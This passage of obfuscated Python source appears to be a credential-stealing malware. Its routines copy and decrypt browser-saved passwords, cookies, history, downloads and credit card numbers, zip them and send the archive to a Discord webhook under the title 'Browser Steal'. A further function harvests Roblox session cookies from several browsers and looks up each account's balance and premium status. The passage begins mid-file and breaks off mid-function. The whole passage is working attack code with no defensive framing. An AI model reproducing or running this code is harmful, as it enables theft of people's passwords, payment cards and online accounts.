    def decrypt_password(YBXIZZPZADRHFPSAKDJRLGJLDSIKZVIWMECSNJUKQAFGAQERYRVCVAYFZVJRJJMWJENTVLPZYGNWBRWOW, ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM):
        try:
            v4r_iv = YBXIZZPZADRHFPSAKDJRLGJLDSIKZVIWMECSNJUKQAFGAQERYRVCVAYFZVJRJJMWJENTVLPZYGNWBRWOW[3:15]
            v4r_payload = YBXIZZPZADRHFPSAKDJRLGJLDSIKZVIWMECSNJUKQAFGAQERYRVCVAYFZVJRJJMWJENTVLPZYGNWBRWOW[15:-16]
            v4r_tag = YBXIZZPZADRHFPSAKDJRLGJLDSIKZVIWMECSNJUKQAFGAQERYRVCVAYFZVJRJJMWJENTVLPZYGNWBRWOW[-16:]
            v4r_cipher = Cipher(algorithms.AES(ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM), modes.GCM(v4r_iv, v4r_tag))
            v4r_decryptor = v4r_cipher.decryptor()
            v4r_decrypted_pass = v4r_decryptor.update(v4r_payload) + v4r_decryptor.finalize()
            return v4r_decrypted_pass.decode()
        except:
            return None

    def list_tables(ETQCMWNTXAORHFBRRVQIUJHZPVMCNCQKRSZPIBSLMDYBRNUSICDEQJCYRUSJGBABOWKCITYB):
        try:
            v4r_conn = sqlite3.connect(ETQCMWNTXAORHFBRRVQIUJHZPVMCNCQKRSZPIBSLMDYBRNUSICDEQJCYRUSJGBABOWKCITYB)
            v4r_cursor = v4r_conn.cursor()
            v4r_cursor.execute("SELECT name FROM sqlite_master WHERE type='table';")
            v4r_tables = v4r_cursor.fetchall()
            v4r_conn.close()
            return v4r_tables
        except:
            return []

    def get_passwords(QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD, ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT, KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF, ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM):
        v4r_password_db = os.path.join(KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF, 'Login Data')
        if not os.path.exists(v4r_password_db):
            return

        shutil.copy(v4r_password_db, 'password_db')
        v4r_tables = list_tables('password_db')

        v4r_conn = sqlite3.connect('password_db')
        v4r_cursor = v4r_conn.cursor()

        try:
            v4r_cursor.execute('SELECT action_url, username_value, password_value FROM logins')
            FMKTLLXYDRXDAAUTOQYCTPUCNAEEEDGYGOLNEEOHLGOPCSNPUUQBKMBZOQHSVXDZJWHVDSASYQLPMNQGFYTJDD.append(f"\n------------------------------| {QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD} ({ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT}) |------------------------------\n")
            for v4r_row in v4r_cursor.fetchall():
                if not v4r_row[0] or not v4r_row[1] or not v4r_row[2]:
                    continue
                v4r_url =      f"- Url      : {v4r_row[0]}"
                v4r_username = f"  Username : {v4r_row[1]}"
                v4r_password = f"  Password : {decrypt_password(v4r_row[2], ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM)}"
                FMKTLLXYDRXDAAUTOQYCTPUCNAEEEDGYGOLNEEOHLGOPCSNPUUQBKMBZOQHSVXDZJWHVDSASYQLPMNQGFYTJDD.append(f"{v4r_url}\n{v4r_username}\n{v4r_password}\n")
        except:
            pass
        finally:
            v4r_conn.close()
            os.remove('password_db')

    def get_cookies(QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD, ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT, KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF, ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM):
        v4r_cookie_db = os.path.join(KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF, 'Network', 'Cookies')
        if not os.path.exists(v4r_cookie_db):
            return

        v4r_conn = None 
        try:
            shutil.copy(v4r_cookie_db, 'cookie_db')
            v4r_conn = sqlite3.connect('cookie_db')
            v4r_cursor = v4r_conn.cursor()
            v4r_cursor.execute('SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies')
            VJXQGCSWDXDLFQOZNMRUSFEHVQXFXQSLHCYMYYLDFGDOKUUVACQPNEKARURDDAAZGFTDUXXOS.append(f"\n------------------------------| {QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD} ({ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT}) |------------------------------\n")
            for v4r_row in v4r_cursor.fetchall():
                if not v4r_row[0] or not v4r_row[1] or not v4r_row[2] or not v4r_row[3]:
                    continue
                v4r_url =    f"- Url    : {v4r_row[0]}"
                IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS =   f"  Name   : {v4r_row[1]}"
                ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT =   f"  Path   : {v4r_row[2]}"
                v4r_cookie = f"  Cookie : {decrypt_password(v4r_row[3], ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM)}"
                v4r_expire = f"  Expire : {v4r_row[4]}"
                VJXQGCSWDXDLFQOZNMRUSFEHVQXFXQSLHCYMYYLDFGDOKUUVACQPNEKARURDDAAZGFTDUXXOS.append(f"{v4r_url}\n{IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS}\n{ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT}\n{v4r_cookie}\n{v4r_expire}\n")
        except:
            pass
        finally:
            if v4r_conn:
                v4r_conn.close()
            try:
                os.remove('cookie_db')
            except:
                pass


    def get_history(QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD, ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT, KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF):
        v4r_history_db = os.path.join(KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF, 'History')
        if not os.path.exists(v4r_history_db):
            return

        shutil.copy(v4r_history_db, 'history_db')
        v4r_conn = sqlite3.connect('history_db')
        v4r_cursor = v4r_conn.cursor()
        v4r_cursor.execute('SELECT url, title, last_visit_time FROM urls')
        NQAPOFZCTFPMBSJFNXRWVBQBMQKMRPSNZKBFXJWCQHJSQYVNWYOSRLFEYK.append(f"\n------------------------------| {QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD} ({ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT}) |------------------------------\n")
        for v4r_row in v4r_cursor.fetchall():
            if not v4r_row[0] or not v4r_row[1] or not v4r_row[2]:
                continue
            v4r_url =   f"- Url   : {v4r_row[0]}"
            v4r_title = f"  Title : {v4r_row[1]}"
            v4r_time =  f"  Time  : {v4r_row[2]}"
            NQAPOFZCTFPMBSJFNXRWVBQBMQKMRPSNZKBFXJWCQHJSQYVNWYOSRLFEYK.append(f"{v4r_url}\n{v4r_title}\n{v4r_time}\n")

        v4r_conn.close()
        os.remove('history_db')

    def get_downloads(QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD, ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT, KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF):
        v4r_downloads_db = os.path.join(KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF, 'History')
        if not os.path.exists(v4r_downloads_db):
            return

        shutil.copy(v4r_downloads_db, 'downloads_db')
        v4r_conn = sqlite3.connect('downloads_db')
        v4r_cursor = v4r_conn.cursor()
        v4r_cursor.execute('SELECT tab_url, target_path FROM downloads')
        VJWECHRJPICCQDEBBUOQQHOOHYBXUWPDYPQUOEGFOEMQZKDAESHIU.append(f"\n------------------------------| {QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD} ({ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT}) |------------------------------\n")
        for row in v4r_cursor.fetchall():
            if not row[0] or not row[1]:
                continue
            ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT = f"- Path : {row[1]}"
            v4r_url =  f"  Url  : {row[0]}"
            VJWECHRJPICCQDEBBUOQQHOOHYBXUWPDYPQUOEGFOEMQZKDAESHIU.append(f"{ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT}\n{v4r_url}\n")

        v4r_conn.close()
        os.remove('downloads_db')

    def get_cards(QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD, ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT, KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF, ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM):
        v4r_cards_db = os.path.join(KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF, 'Web Data')
        if not os.path.exists(v4r_cards_db):
            return

        shutil.copy(v4r_cards_db, 'cards_db')
        v4r_conn = sqlite3.connect('cards_db')
        v4r_cursor = v4r_conn.cursor()
        v4r_cursor.execute('SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards')
        FQKAGXXFGLZFYVUIFCJUNXOMRWRRZSESQBADEYUXMOZPTLOOCJJ.append(f"\n------------------------------| {QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD} ({ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT}) |------------------------------\n")
        for v4r_row in v4r_cursor.fetchall():
            if not v4r_row[0] or not v4r_row[1] or not v4r_row[2] or not v4r_row[3]:
                continue
            IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS =             f"- Name             : {v4r_row[0]}"
            v4r_expiration_month = f"  Expiration Month : {v4r_row[1]}"
            v4r_expiration_year =  f"  Expiration Year  : {v4r_row[2]}"
            v4r_card_number =      f"  Card Number      : {decrypt_password(v4r_row[3], ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM)}"
            v4r_date_modified =    f"  Date Modified    : {v4r_row[4]}"
            FQKAGXXFGLZFYVUIFCJUNXOMRWRRZSESQBADEYUXMOZPTLOOCJJ.append(f"{IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS}\n{v4r_expiration_month}\n{v4r_expiration_year}\n{v4r_card_number}\n{v4r_date_modified}\n")

        v4r_conn.close()
        os.remove('cards_db')

    def write_files(IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM):
        os.makedirs(f"Browser_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}", exist_ok=True)

        if FMKTLLXYDRXDAAUTOQYCTPUCNAEEEDGYGOLNEEOHLGOPCSNPUUQBKMBZOQHSVXDZJWHVDSASYQLPMNQGFYTJDD:
            with open(f"Browser_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}\\Passwords_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}.txt", "w", encoding="utf-8") as f:
                f.write('\n'.join(FMKTLLXYDRXDAAUTOQYCTPUCNAEEEDGYGOLNEEOHLGOPCSNPUUQBKMBZOQHSVXDZJWHVDSASYQLPMNQGFYTJDD))

        if VJXQGCSWDXDLFQOZNMRUSFEHVQXFXQSLHCYMYYLDFGDOKUUVACQPNEKARURDDAAZGFTDUXXOS:
            with open(f"Browser_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}\\Cookies_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}.txt", "w", encoding="utf-8") as f:
                f.write('\n'.join(VJXQGCSWDXDLFQOZNMRUSFEHVQXFXQSLHCYMYYLDFGDOKUUVACQPNEKARURDDAAZGFTDUXXOS))

        if NQAPOFZCTFPMBSJFNXRWVBQBMQKMRPSNZKBFXJWCQHJSQYVNWYOSRLFEYK:
            with open(f"Browser_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}\\History_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}.txt", "w", encoding="utf-8") as f:
                f.write('\n'.join(NQAPOFZCTFPMBSJFNXRWVBQBMQKMRPSNZKBFXJWCQHJSQYVNWYOSRLFEYK))

        if VJWECHRJPICCQDEBBUOQQHOOHYBXUWPDYPQUOEGFOEMQZKDAESHIU:
            with open(f"Browser_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}\\Downloads_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}.txt", "w", encoding="utf-8") as f:
                f.write('\n'.join(VJWECHRJPICCQDEBBUOQQHOOHYBXUWPDYPQUOEGFOEMQZKDAESHIU))

        if FQKAGXXFGLZFYVUIFCJUNXOMRWRRZSESQBADEYUXMOZPTLOOCJJ:
            with open(f"Browser_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}\\Cards_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}.txt", "w", encoding="utf-8") as f:
                f.write('\n'.join(FQKAGXXFGLZFYVUIFCJUNXOMRWRRZSESQBADEYUXMOZPTLOOCJJ))

        with ZipFile(f"Browser_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}.zip", "w") as zipf:
            for v4r_file in os.listdir(f"Browser_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}"):
                zipf.write(os.path.join(f"Browser_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}", v4r_file), v4r_file)

    def send_files(IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM, OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ):
        OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ.send(
            embed=Embed(
                title=f'Browser Steal  `{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM} "{IGZERTTOGBTIWPVPBNFUTCPQOBXEFRKVHQCHRCPWFQJCJAAYHAFBIFJNUXBBYVRUW}"`:',
                description=f"Found In **{'**, **'.join(LBGCJPWQBZTLEKWRMSTVXRLABQICZWLWQLYIRPPFCAXSYXQUZGJWZRUJCCOUIMVCPQEZNPXDHURHRFPKHCNWAX)}**:```" + '\n'.join(tree(Path(f"Browser_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}"))) + "```",
                color=MFVRFIVOAXNHMQEZPNEJIQDVYWUQZEJIXCCRGPAYMGVQBEMKWHPGKIZXLEYTVSAYHIIIMAZBXKZPGINGACDLYGJNCGR,
            ).set_footer(
                text=RORCMKOVOJLBXVIZOVVHHXDWGQHBMFLSOGGMVGZGVEEASETDAG,
                icon_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW
            ),
            file=File(fp=f"Browser_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}.zip", filename=f"Browser_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}.zip"), username=IUWVUOULDCQPFUGBLWHMHSVAWLCMAYIIZVRTCGIGZVCRXNASJXPDIQQKHNUQQ, avatar_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW
        )

    def clean_files(IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM):
        shutil.rmtree(f"Browser_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}")
        os.remove(f"Browser_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}.zip")

    def tree(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT: Path, v4r_prefix: str = '', v4r_midfix_folder: str = '📂 - ', v4r_midfix_file: str = '📄 - '):
        v4r_pipes = {
            'space':  '    ',
            'branch': '│   ',
            'tee':    '├── ',
            'last':   '└── ',
        }

        if v4r_prefix == '':
            yield v4r_midfix_folder + ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT.name

        contents = list(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT.iterdir())
        pointers = [v4r_pipes['tee']] * (len(contents) - 1) + [v4r_pipes['last']]
        for v4r_pointer, ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT in zip(pointers, contents):
            if ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT.is_dir():
                yield f"{v4r_prefix}{v4r_pointer}{v4r_midfix_folder}{ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT.name} ({len(list(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT.glob('**/*')))} files, {sum(f.stat().st_size for f in ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT.glob('**/*') if f.is_file()) / 1024:.2f} kb)"
                v4r_extension = v4r_pipes['branch'] if v4r_pointer == v4r_pipes['tee'] else v4r_pipes['space']
                yield from tree(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT, prefix=v4r_prefix+v4r_extension)
            else:
                yield f"{v4r_prefix}{v4r_pointer}{v4r_midfix_file}{ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT.name} ({ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT.stat().st_size / 1024:.2f} kb)"
    Br0ws53r_Main()

def R0b10x_C00ki3():
    import browser_cookie3
    import requests
    import json
    from discord import SyncWebhook, Embed
    import discord

    BSULAGYSRHRDPPCSNNVNUDKJOTZTACHPDRNUYIAQIIKGXQVYKIEKFVSAFSXCUWIJNGVPPJ = []
    def g3t_c00ki3_4nd_n4vig4t0r(TMJJLMMACQOLGYPWUBDVZCTAFGXLMSLCWGWGEPIHNWYFIWABFLWJSKZIABWACMOUSZSVOSYTSNRQLTDPDQMOGTEHWW):
        try:
            v4r_c00kie5 = TMJJLMMACQOLGYPWUBDVZCTAFGXLMSLCWGWGEPIHNWYFIWABFLWJSKZIABWACMOUSZSVOSYTSNRQLTDPDQMOGTEHWW()
            v4r_c00kie5 = str(v4r_c00kie5)
            v4r_c00kie = v4r_c00kie5.split(".ROBLOSECURITY=")[1].split(" for .roblox.com/>")[0].strip()
            v4r_n4vigator = TMJJLMMACQOLGYPWUBDVZCTAFGXLMSLCWGWGEPIHNWYFIWABFLWJSKZIABWACMOUSZSVOSYTSNRQLTDPDQMOGTEHWW.__name__
            return v4r_c00kie, v4r_n4vigator
        except:
            return None, None

    def Microsoft_Edge():
        return browser_cookie3.edge(domain_name="roblox.com")

    def Google_Chrome():
        return browser_cookie3.chrome(domain_name="roblox.com")

    def Firefox():
        return browser_cookie3.firefox(domain_name="roblox.com")

    def Opera():
        return browser_cookie3.opera(domain_name="roblox.com")
    
    def Opera_GX():
        return browser_cookie3.opera_gx(domain_name="roblox.com")

    def Safari():
        return browser_cookie3.safari(domain_name="roblox.com")

    def Brave():
        return browser_cookie3.brave(domain_name="roblox.com")

    MQEGHHCQUNOVGWECOSUUSLKKAXOKYLLDQZQDWAVLRCKFVMIDPMUPPOLCCZKVUS = [Microsoft_Edge, Google_Chrome, Firefox, Opera, Opera_GX, Safari, Brave]
    for v4r_br0ws3r in MQEGHHCQUNOVGWECOSUUSLKKAXOKYLLDQZQDWAVLRCKFVMIDPMUPPOLCCZKVUS:
        v4r_c00ki3, v4r_n4vigator = g3t_c00ki3_4nd_n4vig4t0r(v4r_br0ws3r)
        if v4r_c00ki3:
            if v4r_c00ki3 not in BSULAGYSRHRDPPCSNNVNUDKJOTZTACHPDRNUYIAQIIKGXQVYKIEKFVSAFSXCUWIJNGVPPJ:
                BSULAGYSRHRDPPCSNNVNUDKJOTZTACHPDRNUYIAQIIKGXQVYKIEKFVSAFSXCUWIJNGVPPJ.append(v4r_c00ki3)
                try:
                    DTTKRPBXBNTZCPNWIBULWVQYQKWGOLLLKAQIMNRORYRURNSQXZSCYRXWZFVJICLQDEIKUUDNFMJXJT = requests.get("https://www.roblox.com/mobileapi/userinfo", cookies={".ROBLOSECURITY": v4r_c00ki3})
                    PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP = json.loads(DTTKRPBXBNTZCPNWIBULWVQYQKWGOLLLKAQIMNRORYRURNSQXZSCYRXWZFVJICLQDEIKUUDNFMJXJT.text)
                except:
                    pass

                GFOEXXCFWAZWMKWWGEUHLOAUZXAOBDOATNVEKQXTCQHOYRBZILAFLXR = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('id', "None")
                ZKYEADYOWLQVHRPOZTBEASMIDJALJVEHWHILZOAXVMVIAVXKMVJLHQTQMTQRJKTKZORKSBTLPVEYP = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('displayName', "None")
                BPHKCCJGRZRNTKANWLIAOLQRJMMGBVIPAWTZSQBTENLMTFNPUXLBW = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('name', "None")
                QPNOZPMWHGWYZJOXPXZFWDJTLDABRIQWEFJHTOVOTMTMIIJPNPZVIHYEFOLRTRGXOYKBDVLFOVWKQBEFYVOOFFMXRGAD = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get("RobuxBalance", "None")
                QATMQTZLZEGZYOOMEKZCFGOLMKSEOUCTQRNNGBWPPEAVXUBOJAQNYBJPULOETXBLIIHNHCVNYNBHMFRNLEHZPHTMOPPJCROCPR = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get("IsPremium", "None")
                CCHUQTJYNLMPBWECFFWCBIWVSLBPSBKTQSDNWTKURYYLCZMXDTYGVNGGPYZBTTMSK = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get("ThumbnailUrl", "None")
                TUJNKQRALZDOWLBFKGNAMWCJBZLWNVHAWHUQKTHTEMOEOZNXHDXMEOLTODOPFWSOLCKBEABC = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get("IsAnyBuildersClubMember", "None")
        
                ROULACTXFJURVSNZGYOJWNURVAGVCTQHDDQMDHVIGYFHEOGVSEGOUVSPWR = len(v4r_c00ki3)
                MRJSPBIHOMTSKSDYXYVYEJCBNKROYQFCGZBUTGVBPGFMRSLXIGPNETTWZBI = ROULACTXFJURVSNZGYOJWNURVAGVCTQHDDQMDHVIGYFHEOGVSEGOUVSPWR // 2
                QHAOMFXERKCXTTLAGXPJWRZJNATMZOFLMZGOHEPBBBNZHRABRWKLVPFBFXKU = v4r_c00ki3[:MRJSPBIHOMTSKSDYXYVYEJCBNKROYQFCGZBUTGVBPGFMRSLXIGPNETTWZBI]
